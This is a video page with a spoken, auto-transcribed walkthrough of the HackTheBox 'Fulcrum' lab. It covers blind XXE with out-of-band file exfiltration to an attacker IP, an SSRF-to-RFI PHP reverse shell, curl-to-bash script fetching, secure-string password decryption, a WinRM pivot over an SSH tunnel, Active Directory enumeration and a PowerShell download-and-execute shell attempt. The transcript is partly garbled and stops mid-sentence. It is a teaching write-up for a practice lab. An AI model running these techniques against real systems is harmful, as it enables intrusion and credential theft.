HackTheBox - Fulcrum

IppSec · Beginner · 🔧 Backend Engineering · 8y ago
02:08 - Begin of Recon
14:00 - XXE Detection on Fulcrum API
17:40 - XXE Get Files
23:40 - XXE File Retrieval Working
24:30 - Let's Code a Python WebServer to Aid in XXE Exploitation
39:45 - Combining XXE + SSRF (Server Side Request Forgery) to gain Code Execution
47:28 - Shell Returned + Go Over LinEnum
56:49 - Finding WebUser's Password and using WinRM to pivot
01:06:00 - Getting Shell via WinRM, finding LDAP Credentials
01:14:00 - Using PowerView to Enumerate AD Users
01:27:06 - Start of getting a Shell on FILE (Troubleshooting FW)
01:35:35 - Getting shell over TCP/53 on FILE
01:37:58 - Finding credentials in scripts in Active Directory's NetLogon share, then finding a way to execute code as the Domain Admin... Triple Hop Nightmare
01:58:10 - Troubleshooting the error correctly and getting Domain Admin!
02:03:54 - Begin of unintended method (Rooting the initial Linux Hop)
02:09:54 - Root Exploit Found
02:12:25 - Mounting the VMDK Files and accessing AD

What You'll Learn

The video walks the Fulcrum box end to end. It starts by spotting the one service with a unique server header (the API on port 56423), switching the request body from plain parameters to XML, and detecting a blind XML external entity (XXE) injection by making the parser call back to an attacker web server. Files are then exfiltrated out-of-band with a two-stage parameter-entity DTD (php://filter base64 in stage one, the encoded contents sent back in a URL in stage two), served dynamically from a small Python web server. The same XXE is chained with server-side request forgery (SSRF) into the PHP include on localhost port 4, turning it into a remote file include that executes a PHP reverse shell. From there the video pivots over WinRM on the encrypted port 5986 using a Ruby client (Metasploit, CrackMapExec and the Python client did not work), enumerates Active Directory with PowerView, gets a shell on the file server over TCP/53, and works through a multi-hop credential chain to Domain Admin. An unintended route is shown at the end: a kernel privilege escalation on the initial Linux hypervisor followed by mounting the VMDK files. Tools used include nmap, Burp Suite, Python, CherryTree, LinEnum, PowerShell and an SSH reverse tunnel.

Full Transcript

What's going on YouTube, this is IppSec and we'll be doing Fulcrum from Hack The Box, which is going to be an extremely tough box. This is probably the hardest Hack The Box machine that has been launched, and that's why the image on this machine is just not really anything special; I didn't spend much time creating the graphic because I need all the time in the world to go through this box.

It starts off with an XML external entity that is a blind attack, and that will gain you a shell if you chain it to a PHP application listening on localhost through, like, server-side request forgery. Get that shell, and then there was an unintended privesc on the box that came out eventually with some kernel thing. We go over that at the end of the video; that makes it a bit easier. If you do that, essentially you can pop root on the very first thing, then read the hard drives of every other box and get flags that way. That's the easy way. The hard way involves a lot of work, so let's see. It starts off with doing some type of pivoting into WinRM, and in order to do that you've pretty much got to use the Ruby package manually. Metasploit, CrackMapExec and Python didn't work. PowerShell on Windows does work: you could tunnel it to a Windows machine and then do an Enter-PSSession; that is the easiest way to do it, but WinRM the Ruby module works. Big thanks to Alamot for finding that, or I don't know how you say his name, A-l-a-m-o-t. Anyways, get a shell on that box, then you've got to do some Active Directory enumeration, and it's a pain because the box you're on doesn't really have firewall rules off, so you either got to get PowerView on the machine to do it or do manual LDAP queries through PowerShell to enumerate users. Once you do that you get on a file server, which then you enumerate a bunch of login scripts and eventually get a domain admin password. At least I believe that is the whole chain; we'll find out. Let's just jump in and do this box.

The very first thing we'll do is the nmap, so nmap -sC for default scripts, -sV, -oA to output all formats, put it in the directory nmap/initial, then the IP address of Fulcrum which is 10.10.10.62. This does take some time to run so I've already run it. Looking at the results we can see that nginx 1.10.3 is running on port 4, 80, 88, and, not 9001, 9999, and that is about it. It is an Ubuntu box, as everything does have an Ubuntu banner, and we're running OpenSSH 7.2p2 for Ubuntu 2.2 I think. If we Googled this we could find the Ubuntu distro, so if we search that (we may have to turn intercept off), let's just put that in Google. I don't know why I copied HTTP. See if that finds anything. Okay, so Launchpad does happen and we'll see exactly what Ubuntu version this is. It looks like it is gonna be Ubuntu Xenial, not 100% positive about that, but that is our best guess. Doesn't help us, so let us begin enumerating, and while we enumerate I'm gonna do a second nmap -p-, and we're gonna put that also in the nmap folder; we'll call this allports, 10.10.10.62. Let that go and begin looking at it.

So let's look at port 4. Go here, 10.10.10.62:4. We see it says "under maintenance". Look at the page source, we see the link; we can just click the link and see what happens when we click home. Nothing really, so this is very much like CrimeStoppers, how that whole thing worked. If you want to kind of see the source code I recommend looking at that video, but what I'm gonna do is try home.php, and if I get a page back I'm gonna assume that it is appending .php. Two things, and there we go, we do get the page. So I'm assuming this is like an include statement and it's including page and then appending .php; that's why I tried home.php. Let me get a file upload form, so let us just try going to Documents, active boxes, Fulcrum, and we'll just upload an nmap thing to see what happens. Upload image, and we get "upload failed", so we could try putting a bunch of image stuff in the file in case it's checking for an image, but I'm gonna spoil it: it is not.
If you want to, I think it was Popcorn, one of the earlier videos, I go over a lot of that. So we do know there is a home.php and upload.php and an index.php, so let us go to CherryTree and actually keep track of this box in note form, because this is a complex box. So I'm gonna add a child node; we'll call this, let's see, "host", because there's going to be VMs on this box, so I'm gonna call this "web", and then this will be port 4, and this will have "potential" (we can make this a bit bigger so you can see) "RFI on 10.10.10.62/index.php?page=poison". So that's one thing on there: there is an index.php, home.php and upload.php, and I think that is all we know. So if I hadn't done this box before, this is where I would start a gobuster up, putting the .php extension and seeing what other things are there. I'm not gonna do that because you've seen me run gobuster probably around 50 times, so you should have the hang of that tool and be able to do that, and we will progress on to the next port.

So port 80, the actual website, and we just get an error message. This is interesting that it's giving us a Microsoft .NET error message. Going into our nmap we see the header is actually nginx on Ubuntu, so we know this is some type of rabbit hole or something, because there's no reason why our Ubuntu server would be throwing IIS errors. So let's add a port 80 and this is going to be... okay. So let's check the next thing, port 88, phpMyAdmin. You try admin/admin, see if we get in: bunch of error messages, so it looks like even if we had the correct credentials we probably wouldn't get in. So let's add that, phpMyAdmin, okay, and let's see, the next port was 9999, pfSense, and then admin doesn't get in, admin/pfsense doesn't get in. So going back here, that's 9999, pfSense, and if you remember doing the box Sense, pfSense by default locks you out after trying a bunch of things, so we're not going to bother brute-forcing this because it probably does have some type of lockout. So let's go to the next thing. That is it for that one, but on the nmap with all ports we have 56423, so let's check this one out. We get something weird, a response back, nothing really in page source, so let's go over to Burp, turn intercept on and see what this is. That is pfSense I think... oh, that wasn't it; it's got a lot of weird cookies, that's why I thought. I guess just because we hit all the pages it added cookies. So send to Repeater, click go, and we can see that the server has a unique header. Everything else says it's nginx but this one says it's "Fulcrum API beta", so that one thing being unique about it is what's going to clue me in and start testing it. So let's put that in the notes, and one way... I don't do CherryTree in videos because they're rather straightforward, but you'll see as we progress through this, having notes is definitely going to help. So see, can I rename that real quick? I'm sure the real name is... it's F2, there it is, and I'm just going to make a new one, "ports", and we can move all these in here. Okay, so this is "server header is unique: Fulcrum API beta" or something along those lines, and let's play with this. So let's send this, and we don't get anything different. We can get rid of these cookies because this is all phpMyAdmin: pma, phpMyAdmin, PHPSESSID, don't need those, so let's just clean that up.

If we try changing these variables, let's try ping, ping, ping, whoami; nothing really happens. But this is an API, so one of the things you generally should do when you fuzz APIs is change the way you're inputting data. This is common in like NoSQL databases: when you give it crap, regular plain-text stuff, so if this was Heartbeat, Ping is equal to Pong, it's gonna be something like that; then you change to JSON, you may be able to do weird things that it didn't expect because you go down a different code path. So we're gonna try changing this to an XML request, because XML is generally pretty buggy. So let's see, whose Content-Type is there, one Accept? Doesn't look like it, so let's change this to XML. So Heartbeat, then we could do Ping, we'll do Pong because that's what it is, /Ping, /Heartbeat, and we can make this a bit prettier to make it easier to read. So send this, nothing really happens; we can change it to Ping and we do get a slight change on Heartbeat, and now it says Ping Ping. So that is a clue that this is going to be cross-site... no, XML entity injectable. And also, if you didn't want to do this, if you're just completely fuzzing it, I think Burp or some automated scanner may pick it up. Because if we go, let's see, let's try, turn intercept off, and let's see, I think it's GitHub PayloadsAllTheThings, yes. This is a really good GitHub repository for a bunch of quick proof of concepts, and you can see there is XML entity injection: basic, PHP wrappers inside of it, denial of service, blind. So this is what you want to do, and I'm going to do one of those real quick. And we're not going to put any real data; we'll just say XML version equals 1.0, encoding equals UTF-8. Okay, that's the header. We'll do DOCTYPE foo, ELEMENT foo ANY, okay. The next line is going to be ENTITY xxe, and these foo's and this xxe are names, so they don't really mean that much if you try to make sense of it, and then
we do http://10.10.14.30/, we'll do this on port 9001, and we'll say go to the URL, or URI, "please subscribe". Okay, and all we have to do is put some type of variable so it calls xxe, so we'll call it xxe, then &xxe;. If I typed that all correctly it will hit my web server on port 9001, so nc -lvnp 9001, go. We're not getting a response back immediately, and we get the connection, and we see it did go to "please subscribe". So if you just ran some type of web scanner, chances are it would pick up XML entity injection if it was checking for it. It's a bit hard in the Hack The Box lab because Burp Suite will do Collaborator, which goes to the cloud, but the servers aren't connected to the internet, so I don't think that will work. So that's why I did this all manually instead of doing like... oops, Collaborator, of course. Burp's Collaborator is also a paid feature. So that is how to test for XML entity injection.

If we wanted to we could also do cool things like create a transform file which will allow us to read files off the server. We can also get to code execution eventually, but let's do reading a file first. I'm going to copy this, go to CherryTree, and we'll put "XXE"... "blind POC", and I have an R at the end, don't know why, but there we go. And create a new tab here, call this "blind POC", call this "file read". And in order to do this we're gonna have to do a blind method. If you didn't catch me do it earlier, it's blind because if we do Heartbeat, Ping, "hipsx", /Ping, /Heartbeat, we still get Ping Pong. If this is changed to Ping with a capital P, we get... the output differs; if we put anything else, ping with a lowercase p, it's going to say Pong. So we can't really control anything. If this wasn't blind, we'd be able to do like that, and &xxe;, and then the output would have come here, but because we can't see the output we have to do a blind method. The blind method that is the easiest is making the server make HTTP requests to us and sending the data in the URL. So that's what we're going to do, and in order to do that we have to make a quick change here. So we put a % before that xxe; we're still going to make a request to our server, because in order to do this we have to do an external entity and create a transform file. So we'll just do transform.xml, and we also have to pass a few parameters, so this will be %xxe; and then %param1; we'll call this, and this will be called thefile. So if we make this request it's... but I can go to a web server and then not do much else. So if we do 9001, we're listening, click go, and it hangs, and it makes a request to transform.xml, which we have to create. So let's make a directory called www and then vi transform.xml, and this one is going to be ENTITY % data... I could type... oh my god, there we go. data SYSTEM, and I'm gonna do the PHP filter. When we went to PayloadsAllTheThings it showed that we could, and the reason why is we're putting this in a URL, so it has to be all good characters; can't have a lot of weird things, so doing the PHP filter, and the resource is going to be, let's do, let's see, passwd, and that's it for that line. Now we have to do ENTITY, my fingers forgot what percent is, %param1, and then ENTITY xxe... no, this is thefile, SYSTEM http... there's no way I'm typing this from scratch right the first time, 14.30:9001/, we'll just do %data;. And if I typed this all correctly we will see two different requests: first we will see the server pulling transform.xml, then we'll see a bunch of base64 which will be /etc/passwd. So let's see, what do I have, thefile; I think this shouldn't be thefile, but we'll click go. Now this should probably be xxe, or I think... we'll try, let's actually see what happens. Nothing, it's still getting transform. So let's cat transform.xml and let's make sure. Is it data we want? Nope, not data. Let's see, what are we doing: clean the document, clean the entity xxe, and then SYSTEM transform.xml, or sending %xxe; then sending %param1;, and that is going to transform.xml, and that is going to be ENTITY data SYSTEM, grabbing the file there. Oh, I don't have this double quote; that needs a double quote, and then let's see, param1, data, go. Took longer, still did not do it. So let's see, ENTITY then param1, and thefile, that's what we called it. So right here, this is the variable we want, it's thefile, because when we call this it's going to call that out of the transform piece that it pulled right up here. So click go, click here, and we have a bunch of base64. There we go. I couldn't find the file, but if we vim passwd.b64, base64 -d, we get everything.

So let us create a Python script to make this a little bit more manageable, because if we want to pull a lot of files then we can't really do that, because we have to keep editing by hand. So let's create a new script called xxe.py, and we start this off with #!/usr/bin/env python, and this can be python3. So we do from http.server import BaseHTTPRequestHandler, HTTPServer; from base64 import b64decode, because we have to decode from the URL. And then we've got to create the HTTP class, so class HTTPRequestHandler(BaseHTTPRequestHandler), we just imported that up here, and then we can do a definition, do_GET is I think what it is, and to test this out we're just going to print self.path, and that will be it for that. And finally we just have to run the program, so to run it automatically, if __name__ == '__main__', then server_address is equal to, we'll listen on all interfaces on port 9001, and httpd is equal to HTTPServer(server_address, RequestHandler), serve_forever. And then we can just run, so if we do python3 xxe.py, starting server, we're listening on port 9001. So if we curl 127.0.0.1:9001, put anything there, it's just going to print everything we send it. So the reason we do that is because now we can create custom pages, so this very much follows along like a web development path, and the reason we're doing this again is just because the server makes a
request to us, and that file changes; that transform file keeps changing, and instead of making a bunch of files on the box I'm doing this all dynamically. So the idea is going to be, the request is going to look like stage<number>, so stage1, and then do a question mark, file name. So let's see, then we can do stage2, file contents, and then all else, give me shell. So that's the logic of this program. These comments are pretty ugly, so I'm gonna remove them. We'll say stage, data is equal to self.path.split, and we'll split on the question mark, so that means everything to the left of the question mark is going to be the command, everything to the right is going to be the argument, and that's exactly how web pages work. So if stage is equal to stage1.xml, and we have to put that slash in, then we're going to do message is equal to, and let's see here, split the long string, look this way so we can copy and paste better, and we want to grab www... Did I delete the file? Maybe I deleted the file or I was in a different directory, I don't know, cause I could have sworn I had the... oh, did I do a transform file? I swear I did a transform file already; it just disappeared. We'll retype it. So ENTITY % data SYSTEM php://filter/convert.base64-encode/resource=, well, and this will be plus data, and that is grabbed up here, and then plus triple quote to go back into adding a string, and then we want a single quote, and then the next line we want ENTITY % param1, ENTITY, and we'll call this, so I'll call this exfil, I think this was thefile last time, SYSTEM http://10.10.14.30:9001, and this will be stage2.xml?%data; and single quote, that matches, and okay. Then we just need to print... do we want to print data? I don't think we want it yet. Now we can do if stage is equal to stage2.xml, and we just want message is equal to nothing, print b64decode(data).decode('utf-8'), because this is Python 3 and everything I think would be UTF-16 or something weird. Then after this if statement we want to do self.send_response(200); this sends the HTTP 200. Then we got self.end_headers(), okay. Then we can do self.wfile.write(bytes(message, 'utf-8')), and this is writing it out to the actual console or the web server; we have to write this message to the web server, and that's what this wfile stuff does. And that may be good, if I did everything correctly the first time, which everyone knows probably isn't the case. So we started the server, let's go to Burp, and we can change this to be, let's see, stage1.xml, /etc/passwd, click go, and it did not work, big surprise. I don't know why I got rid of that, but oh well. 127.0.0.1:9001/stage1.xml: empty reply from server. This needs two things. Okay, do we only get one line here? We get two lines. So let's see, ENTITY % data, PHP filter, we got two quotes on both ends, that looks good. Oh, we changed the name from thefile to exfil; I don't think that was it, but we can try. Okay, so that has been fixed. Then the next thing we do is, let's see, in the exfil, SYSTEM 10.10.14.30, that's my IP, 9001, that looks good, stage2, that looks good, and single quote terminates that, then we get this, terminates that, double quote terminates that, and this terminates that. That looks good. So let's see over here, maybe this is where the mistake is. It makes the request to stage1.xml, let's see, passwd. So let's print that and make sure. Oh no, you know what, print data, because we know the data. Data is right there, so it definitely should grab that. So let's see, I didn't save it. Just grabbing the file without doing this, because I didn't take that note. Awesome, we just had the blind POC, let's go back here. Cool. Oh, we never have any server headers. I don't know if that could be it; like, here's the header we're sending... well, no, don't do that. There's a header we're sending, and then we literally just send data back, so let's fix that. Let's see, we have headers, so that's what we need. Okay, we have a 200 response back. Let's see if this now gets it. Go. There we go, except this is a little bit ugly, so let's see, we need a new definition to change how we do logging, so def log_message(self, format, *args), and we won't do nothing, just return. Go, and there we go, we can get files off the box.

So let's see what happens if we just specify a directory. So if we just do /etc, see if it's able to pull directories or not. It is not, it errors, but we could try, let's see, let's see, oh, /etc/lsb-release, let's see, Ubuntu file, and it looks like it grabs it three different times, but you get the point. So that is the Python script to do XXE.

So now let's dive into doing the actual code injection, and this comes with a little bit of knowledge and guesswork based upon the upload. So remember when I did this page we'd get "under maintenance", and if we do an RFI-type attack, so 10.10.14.30, we'll say 9002, it just says "under maintenance" for us. But if we go back into Burp, and we'll do... actually we can do the blind POC, we can say, let's see, we can try a server-side request forgery attack. So if we copy all this, go back to blind POC, do this: http://127.0.0.1:4 and then index.php?page= and then our URL. So now the XXE is going to force the server to go to localhost on port 4, and it's going to tell the server to try to go to us, so we'll see if this has an RFI. So let's do that, nc -lvnp 9002, click go. We did not get anything back. Let's see, do we have everything right, is this all in one line? That is 127.0.0.1:4/index.php?page= is equal to that. Maybe we can do /test, because it appends .php, so what probably just happened is it did that, which then no longer returns anything. So we'll try this, let's go. We don't get a response back, and we get a request to it. So now we can include PHP files, so if this 9002 was hosting a PHP script it would then execute. So let's go back into the Python script and add PHP logic. Okay, so let's
see, let's add a try. So we do try, and then let's do qa, 1 2 3 4, a... shoot. qa, 1 2 3 4. Let's get out and redo this because I screwed up my macro. So let's see, try, then okay, sweet: qa, insert 1 2 3 4 spaces, go down a line and hit Home, Escape, end macro, and we'll say this for the next 5 lines, so 5@a. There we go, we just need two more, so 2@a to do those. There we go, that one to except, and this is going to be PHP code, so message is equal to some PHP script stuff. Let's see, where is it, shell, PHP, php-reverse-shell. So you just go to pentestmonkey, it's here. Also if you're on a Kali box, this file I think is stock on Kali; I just moved it because it's in a weird folder, it's in SecLists, there it is, it would be here on your box. So let's see, let's edit this. We don't need all these comments. Okay, let's send the shell to port 9002. Okay, let's cat that file, pipe it to xclip, -selection clipboard, I think I did okay. :set paste. It's not the right clipboard; hold Ctrl and paste. There we go, and that'll probably do it, as long as I didn't make an error coding, which again is bound to happen. So let's do python3, and we will say nc -lvnp 9002, okay. We can go here and we just got to make the script error out, so we can say this: file read, "sendmeshells", and since I don't have a question mark it's going to error when it splits, which goes to the except, which then sends the PHP code. And that did not work, not one bit. Actually that works, that does not, so let's go here and see what happened. So whenever we hit this except, let's print a message here. Sure, go. So we hit message; I wonder if we can't send... no, that should be right, everything looks like it pasted correctly, 10.10.14.30... what, 9002... oh crap, I know what we did wrong. We should go here; if we just do "shells" here it should work. We're not doing the whole local file include. There we go, that's the issue, wasn't doing local file include, and still errors out. And why... boxes... there we go. What's wrong? Oh well, this isn't off to a good start. Go here, we make it trigger the RFI. 9001, I reused the port. There we go, finally we have a shell.

So we're now on Fulcrum. If we do whoami, www-data; uname -a, fulcrum. So let's get a real shell: python -c 'import pty; pty.spawn("/bin/bash")'... forgot a single quote, there we go. So stty raw -echo; fg; export TERM=screen, and now I can clear. So the first thing I want to do is run LinEnum.sh, so let's copy that here, /opt... that makes... no, I'm not. Let's go to www, go in that directory and python -m SimpleHTTPServer 80, and we can curl 10.10.14.30/LinEnum.sh and pipe it to bash. While this finishes running let's just go to the top. We can search for, what was it called, there we go. So we can see this box was built in 2017, it is Ubuntu Xenial, so we were correct there, 16.04. Hostname is fulcrum. www-data, this may be us; I don't think it is, probably is actually. We have a user called blueprint who logged in from 10.10.14.2. Other users in the box: we'll be able to go into blueprint's... some directories, so that is something we should check out. It looks like we've already looked at it and nothing too interesting there in blueprint's home directory. This was like /var/www, which is probably my home directory since that's the user I am, and we have api, pma and uploads; guessing uploads is on port 4, pma is that phpMyAdmin and api is the thing we are fuzzing. Cron, not too interesting. Network: we have a lot of interfaces and these don't really have IP addresses. We have 192.168.122.1, then a bridge, a bunch of different vnets, so something funky is going on this box to have a lot of vnets. Then we got web, webnic... see what else is there, webnic. So this guy talks to a box on 192.168.122.228. It's pointing to Google for the name server, and nginx running on everything. Running processes, whoa, so this is interesting: we got running processes of libvirt: firewall, web, DC, file. So we got a bunch of VMs running on this, and we should have like the VMDKs here; we can see if we can read them, but if we had a privesc on this machine, which we do, we'll get into it at the end of the video, the unintended method, then we could just pull the flags off the VMDK files. But let's go back to CherryTree, and this is why I was making sure I took notes on this box, because this is where it gets interesting. We don't want that there; we can move this to host. So we get the firewall, we got DC, web... I think Windows it was running, yeah. Then we got, let's see, firewall, DC, web, DC, file server here. We can rename web to be "VM host DMZ". Whoa, normally it's not smart to run your hypervisor on the first thing you exploit, but let's see, and that's that.

So let's go and poke around the server, and it looks like my shell died. That shouldn't have happened. That nc on 9002... maybe the box got reverted. Let's see, python3 xxe.py, we need to listen on 9002 real quick. So let's organize our terminal; this will be called HTTP, and this will be VM... that has the ones in use, because of that it's 9002. Go, got a shell again. I probably killed it, cancelled it in Burp or something, and that's what did it. python -c, okay. So let's go poke around. Check home; I think we did this in the previous check, but look at files, nothing there. Let's go to /var/www/html, nothing there. find api -type f, we just got one file there. Yeah, pma is probably gonna have a lot because that's phpMyAdmin. It's weird that it's timed out. Let's see, get another shell; it does time out. There should be a way to move off this, but I'm not positive. And bash, okay, then let's do foreground, okay, export... screen really annoying, so let's see, tmux new fulcrum, tmux exits right away, let me do screen. Okay, /var/www, if we go to uploads we do have a PowerShell file, Fulcrum_Upload_to_Corp.ps1, so let's see, this does PowerShell remoting to the external interface, and the password is encrypted. So this is just a PowerShell secure string, and we got both the password and the key, so we can
decrypt this. Let's see, copy this, and there's something interesting with PowerShell on Kali right now, so I'm going to do PowerShell right there and I'm going to... is it export? Oh, I don't have that option anymore. PowerShell is going to crash very shortly and you have to disable the telemetry to do it. So let's see, pwsh Linux disable telemetry, and the reason is there is some crypto library that is mismatched, and when the telemetry thing activates or does something it segfaults PowerShell, which is really annoying. Let's just try the GitHub page, github PowerShell, see, is it here? I don't want to do find, search for things on this page, there we go. When you create this variable... I bet if I go back to my console PowerShell has already crashed, unless an update fixed it and I just wasted a bunch of time. Nope, segmentation fault. So we set that equal to 1 and then do pwsh, pwsh; that top one is going to crash shortly. What do we want to do, go to the DMZ and grab all this stuff, paste this in. Okay, we got the secure string, and now we've got to decrypt a secure string. So if we just go to Google, "powershell decrypt secure string", let's see, one-liner; I like one-liners. Let's see, copy this, there we go. Segmentation fault at the top. It does not like the paste; whenever I try to paste... there we go. This, we make this for... we get the password. So there's the password. Go to CherryTree, let's see, password, there. Go back to the DMZ, and let's see, do we have a hostname? We do, the computer is upload. Let's try to connect to it, and the username is WebUser. So if we do it, and let's nslookup upload.fulcrum.local: not found. Hang on, ping upload.fulcrum.local doesn't really... we can't resolve that hostname. So if we just look at the ARP table again, we're gonna try this IP address just because, well, nothing else to do. So that's that, right there, and we'll have to do some type of scan on it. So let's see, nmap static binary github. Who cares, 64-bit it is. Save. Go back to HTTP, split, actually listen in www so I don't expose anything I don't want. Oh, and now we can copy nmap, and then download that nmap, 10.10.14.30, make it executable, and then we want to grab that IP address, and to save time I'm gonna search the ports I know. I know it's within the 5900 range; there's going to be a Windows Remote Management thing. So let's see, I hit V as this runs, I can increase the verbosity, and that will tell me whenever it hits an open port immediately. So we can see port 5986 is open, and this is WinRM encrypted connections; 5985 is WinRM unencrypted, or basic authentication. So we need to do Windows Remote Management, and unfortunately the encrypted piece, I had problems doing it with pretty much everything but Ruby. Talked with a guy on Hack The Box, Alamot, A-l-a-m-o-t, and he helped me out with finding a good Ruby thing, because the way I did this when I first did the box is I just did a port forward back to my Kali box, loaded up a Windows VM and did Enter-PSSession and did this stuff from Windows. But we're gonna do it all from Linux because I don't want to load up Windows. So we're going to go to a cool GitHub page, Alamot code examples github, I think that's not it, code something, code-snippets. So if you clone this repo there's going to be some WinRM things you want, so we'll call this winrm and we're going to copy these out of /opt because we're going to edit them. So if you go, let's see, code-snippets, winrm, and this is just based upon, if you Google "ruby winrm", the code is gonna be almost identical. There's a few quality-of-life things just to make the shell and file uploads a bit easier, but let's see, they have an example to show... anything? Yeah, so here's the code, and then if we go and cat winrm_shell.rb you can see it's almost identical. So let's edit this. Whoops, username, this is WebUser, the password, this, okay. IP, port. So we have to do a port forward because we can't reach the 192 subnet. Oh no, that was bad. So I did 127.0.0.1, which is myself, and port 5986 still, and then let's go and do a reverse shell. So first things first, vi /etc/passwd; let's give my ipsec user no shell, so if someone gets on that they can't just run commands on my box. SSH, we do -R for a reverse tunnel, and then 5986, and we want to send stuff to 192.168.122.228, I believe, 122.228, yep, 5986, and then our box, which is ipsec, and then 10.10.14.30. Okay, we got... start SSH, well, again, okay. "Cannot chdir"... the -N... and if I do, well, that's ugly, there we go. Need -N to not execute commands, so that shell thing doesn't work, but if I do netstat -alnp | grep 5986, I am listening, and if I curl 127.0.0.1:5986 it's going to go through. So 5986 is listening on my local box and it's going to hit this SSH on the very first Fulcrum server; that's going to direct it to this address, which is the IP address of... we don't know the hostname yet, and 5986, which is the WinRM port. So now I can just do ruby winrm_shell.rb, and if you get any error messages you can just do gem install and then the package that's missing. And we are now on the web server. So on a Windows box we're running as the user WebUser, and let's see, hostname: web server. So I'm just exiting out, we'll move to three and we'll rename this to web, and now let's log back into this box. So ruby winrm_shell.rb. So we do dir and we see right off the bat there is a user.txt file. It's not 32 or 33, so I'm just going to look at it, and that's the length, and we just see "you need to go deeper". So we still don't have the user.txt flag and we popped two different boxes. There are two files on this box: there is Invoke-PsExec and CheckFileServer.ps1. So I'm going to look at CheckFileServer.ps1, and let's see, "waiting for IT to give me the address", it's getting credentials, and nothing. So what's creds? Let's look at Invoke-PsExec.ps1, other credentials in this? Nothing at the bottom, and doesn't look like we have any credentials here. So let's keep poking.
around the box it's good at the desktop yes exec is on it we were just in documents let's we'll get downloads nothing there is on this box it is a web server so I'm going to look in our net pub let's go to dub dub dub root web config and let's see we got a host name the domain controller would deceive fool calm down local and we have a password and a username so this is going to be probably a low privilege user with LDAP privilege or not LDAP just like bind privileges domain users can search Active Directory for a bunch of things and we could do a bunch of LDAP queries manually but I like using Power View in this case so going to for exit let's just copy these creds let's see see we got full comb got LDAP and password for searching I know this cherry tree isn't super organized name war but oh well DC fulcrum okay so we'll exit out of here and we're going to do win RM shell with upload and before we do that let's copy power sploit real quick CD upped who is power sploit it's in PowerShell so CP tower shell power sploit and we want recon we could do like powerup and all that stuff but I just want to connect and see what is in Active Directory so copy power of U so this time I'm going to do that win RM with file upload so we can upload the file so we can copy or config I forgot set paste okay so we can execute this then you just do upload Power View PS 1 2 C colon backslash what is it users web user documents I think okay now we can do input module Power View ps1 so this allows us to do a bunch of just cool commands so we can do get the main user think that's it I know we have to do credentials first so now create the secure string so the password will be secured pass then we convert to secure string the password was password for searching then as plain text force then cred is equal to object system management automation yes potential the username which is fulcrum slash ode app and then the password which is that string okay we do cred we have the username as LDAP and 
the password is our secure string so we should now be able to query the domain so if we do get domain user - credential cred - domain controller DC fulcrum local do enter should start doing something maybe and there we go it's dumping a bunch of the records in Active Directory and I've got there is a lot more than you'd expect we have a lot of user accounts so let's see I can pause that output and we can look at it get domain there we go so the administrative account has a login count of 29 times his last pad password was in 2017 it's a normal account password last set so you can see it pulls a lot of information from this and there's a lot of I guess fake accounts in here so if we do Sam account name we get an account called 8 7 9 F another one probably or is it 97 f 0 so there's just a bunch of bogus accounts so I'm going to ctrl C out of win RM don't gonna redo that I don't have my up arrow unfortunately so let's retype everything we have to do import module our view ps1 then SEC pass is equal to 2 yeah I wish it was a bit shorter too tight then this every time I think that was the password object okay so get the main user - credential cred - domain controller d c-- dot fulcrum dot local we're going to select Sam account name and what are the fields do we think we want probably logon count and last log on and maybe member of let's just do login account and member of log on count and last log on this would be a bit more manageable because it's not dumping like fifteen fields per user and once this finishes and we have an error message I mistyped the domain controller there we go and now maybe once this finishes we'll find out if I can type I wonder if power shelves case-sensitive because I have a capital C and cred nope there's now outputting all the users the number of times they've logged in and the last login time if that's correct cuz yep it is because we have one seven more recent so let's see get domain go to the top highlight everything enter the domain 
logins last logon we'll call it paste it and we can cat that and then grab dash V 1601 we don't care about anything that hasn't logged in before so we just got a handful of accounts now so we went from 1400 accounts to 20 accounts of interest and there are times when these would be interesting like you could try spraying password against all these accounts cuz if they're active and haven't been logged in then maybe it's still set to a weak password but let's see the accounts of interest are going to be of course administrator be tables cuz he has a high login count and probably 9:23 a so let's copy all this and let's see we'll just put all on one and I can deal with organizing later there we go so let's look at be tables first going back to a win remote session we can do the C get domain copy this so we make less typos paste I mean just do B tables and this should pull all the attributes for the B tables user so we can see exactly who this is so the bad password time last time in 2017 he has login rights to the file server it says his name's Bobby tables and one of his name middle name is drop the info tag says his password was set to file server login one two three four five plus plus so let's see probably file dot fulcrum local just guessing fulcrum be tables okay so we can copy this and then we have to do the password thing again so we can do BT pass for B tables it's equal to convert to secure string as plain text force okay then we need to do cred it's equal to subject okay and then the password is BT pass cred looks good so let's do enter PS session computer name file fulcrum local credential cred and it says we're currently in a Windows PS session and cannot use any PS session on another PS session so you can't do nested PS sessions but we can probably do invoke command computer named file fulcrum local credential cred and then script block first name Who am I let's see probably the type is somewhere computer name file dot fulcrum local credential cred 
script block captive a space there we go so maybe it has to have a space or it didn't like that semicolon but we have successfully ran a command as be tables and if we copy this and do a hostname is on the file server so let us get a shell so we can do dub-dub-dub will use the Shang because well that's what we always use for reverse shells more we don't want to do Metasploit or Empire Shang and then let's see shells invoke let's see that will show TCP one line dot ps1 ok just says uncomment and change the IP so we'll try this one and would do ten ten fourteen thirty on port 9000 five I forget what the last one I left off one was cat copy and Co VMP 9005 into command computer name here and we don't have anything back so I'm going to wait for this to terminate because if I control see I'm gonna kill win RM and if I kill when RM then I type all that frickin secure string stuff back and turns I have to type all that secure string stuff back so let's see paste and paste okay so it didn't reach out to my box or maybe my first thought is the Rochelle was bad so we're gonna do info command computer name and it's going to be file fulcrum local - credential cred script block IX new object net web client downloaded strain ten ten fourteen thirty please sub kill the script block go over to HTTP and we're not getting anything so the box probably can't talk to us which is unfortunate so stir this up again and we're gonna do something slightly different so in create a for loop and just do some common ports and see if anything talks back to us so in order to explain that the best way to do is we'll do 1 comma 2 comma 3 comma 4 pipe that and then do right host dollar underscore and then and that you can see that essentially was a shorthand way to write a for each loop or for loop so what I'm going to do is do let's see common ports so we'll say 22 for SS age 53 for DNS 84 for 3 and let's see 4 4 5 some common ports and then we're going to pipe that and do test Net connection 
